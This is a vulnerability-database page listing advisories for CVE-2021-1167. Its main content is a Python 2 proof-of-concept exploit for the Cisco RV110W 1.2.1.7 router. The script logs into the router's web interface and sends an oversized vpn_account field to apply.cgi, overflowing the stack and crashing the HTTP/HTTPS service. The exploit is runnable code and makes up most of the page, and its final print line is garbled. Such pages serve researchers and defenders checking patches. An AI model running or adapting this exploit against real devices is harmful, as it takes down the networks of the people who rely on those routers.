Vulners
Lucene search
Cisco RV110W 1.2.1.7 - 'vpn_account' Denial of Service (PoC)
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | Cisco RV110W 1.2.1.7 - (vpn_account) Denial of Service Exploit | 14 Jan 202100:00 | – | zdt |
 | CVE-2021-1167 | 31 May 202104:10 | – | circl |
 | Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers Remote Command Execution and Denial of Service Vulnerabilities | 13 Jan 202116:00 | – | cisco |
 | 多款Cisco产品缓冲区错误漏洞 | 13 Jan 202100:00 | – | cnnvd |
 | Cisco RV110W/RV130/RV130W/RV215W Remote Command Execution and Denial of Service Vulnerability (CNVD-2021-41220) | 14 Jan 202100:00 | – | cnvd |
 | Cisco Small Business Routers Denial Of Service (CVE-2021-1167) | 22 Feb 202100:00 | – | checkpoint_advisories |
 | CVE-2021-1167 | 13 Jan 202121:36 | – | cve |
 | CVE-2021-1167 Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers Management Interface Remote Command Execution and Denial of Service Vulnerabilities | 13 Jan 202121:36 | – | cvelist |
 | EUVD-2021-6634 | 3 Oct 202520:07 | – | euvd |
 | CVE-2021-1167 | 13 Jan 202122:15 | – | nvd |
10
# Exploit Title: Cisco RV110W 1.2.1.7 - 'vpn_account' Denial of Service (PoC)
# Date: 2021-01
# Exploit Author: Shizhi He
# Vendor Homepage: https://www.cisco.com/
# Software Link: https://software.cisco.com/download/home/283879340/type/282487380/release/1.2.1.7
# Version: V1.2.1.7
# Tested on: RV110W V1.2.1.7
# CVE : CVE-2021-1167
# References:
# https://github.com/pwnninja/cisco/blob/main/vpn_client_stackoverflow.md
# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-overflow-WUnUgv4U
#!/usr/bin/env python2
#####
## Cisco RV110W Remote Stack Overflow.
### Tested on version: V1.2.1.7 (maybe useable on other products and versions)
import os
import sys
import re
import urllib
import urllib2
import getopt
import json
import hashlib
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
###
# Usage: ./CVE-2021-1167.py 192.168.1.1 443 cisco cisco
# This PoC will crash the target HTTP/HTTPS service
###
#encrypt password
def enc(s):
l = len(s)
s += "%02d" % l
mod = l + 2
ans = ""
for i in range(64):
tmp = i % mod
ans += s[tmp]
return hashlib.md5(ans).hexdigest()
if __name__ == "__main__":
print "Usage: ./CVE-2021-1167.py 192.168.1.1 443 cisco cisco"
IP = sys.argv[1]
PORT = sys.argv[2]
USERNAME = sys.argv[3]
PASSWORD = enc(sys.argv[4])
url = 'https://' + IP + ':' + PORT + '/'
#get session_id by POST login.cgi
req = urllib2.Request(url + "login.cgi")
req.add_header('Origin', url)
req.add_header('Upgrade-Insecure-Requests', 1)
req.add_header('Content-Type', 'application/x-www-form-urlencoded')
req.add_header('User-Agent',
'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
req.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
req.add_header('Referer', url)
req.add_header('Accept-Encoding', 'gzip, deflate')
req.add_header('Accept-Language', 'en-US,en;q=0.9')
req.add_header('Cookie', 'SessionID=')
data = {"submit_button": "login",
"submit_type": "",
"gui_action": "",
"wait_time": "0",
"change_action": "",
"enc": "1",
"user": USERNAME,
"pwd": PASSWORD,
"sel_lang": "EN"
}
r = urllib2.urlopen(req, urllib.urlencode(data))
resp = r.read()
login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1]
session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1]
print session_id
#trigger stack overflow through POST vpn_account parameter and cause denial of service
req2 = urllib2.Request(url + "apply.cgi;session_id=" + session_id)
req2.add_header('Origin', url)
req2.add_header('Upgrade-Insecure-Requests', 1)
req2.add_header('Content-Type', 'application/x-www-form-urlencoded')
req2.add_header('User-Agent',
'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
req2.add_header('Referer', url)
req2.add_header('Accept-Encoding', 'gzip, deflate')
req2.add_header('Accept-Language', 'en-US,en;q=0.9')
req2.add_header('Cookie', 'SessionID=')
poc = "a" * 4096
data_cmd = {
"gui_action": "Apply",
"submit_type": "",
"submit_button": "vpn_client",
"change_action": "",
"pptpd_enable": "0",
"pptpd_localip": "10.0.0.1",
"pptpd_remoteip": "10.0.0.10-14",
"pptpd_account": "",
"vpn_pptpd_account": "1",
"vpn_account": poc,
"change_lan_ip": "0",
"netbios_enable": "0",
"mppe_disable": "0",
"importvpnclient": "",
"browser": "",
"webpage_end": "1",
}
r = urllib2.urlopen(req2, urllib.urlencode(data_cmd))
resp = r.read()
print respData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Jan 2021 00:00Current
0.3Low risk
Vulners AI Score0.3
CVSS 3.17.2
CVSS 29
EPSS0.06311
SSVC